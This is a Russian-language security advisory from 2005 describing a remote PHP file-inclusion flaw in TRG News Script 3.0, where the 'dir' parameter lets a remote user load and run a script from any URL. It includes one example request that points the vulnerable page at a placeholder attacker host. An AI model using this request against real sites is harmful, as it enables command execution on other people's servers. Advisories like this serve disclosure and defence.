Security Lab

PHP-инклюдинг в TRG News Script

Дата публикации:22.03.2005
Всего просмотров:1085
Опасность:
Высокая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: TRG News Script 3.x
Уязвимые версии: TRG News Script 3.0

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные команды на уязвимой системе с привилегиями web сервера.

Уязвимость существует из-за некорректной обработки входных данных в переменной dir. Удаленный пользователь может изменить значение этой переменной на произвольный URL и выполнить одноименные сценарии на сервере. Для успешной эксплуатации уязвимости 'register_globals' и 'allow_url_fopen' должны быть включены в конфигурационном файле php на целевом сервере. Пример:

http://[target]/research/news/trg_news30 /
trgnews/install/article.php?dir=http://[attacker]

URL производителя: www.rustedgate.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: TRG News Script Include File Hole Lets Remote Users Execute Arbitrary Commands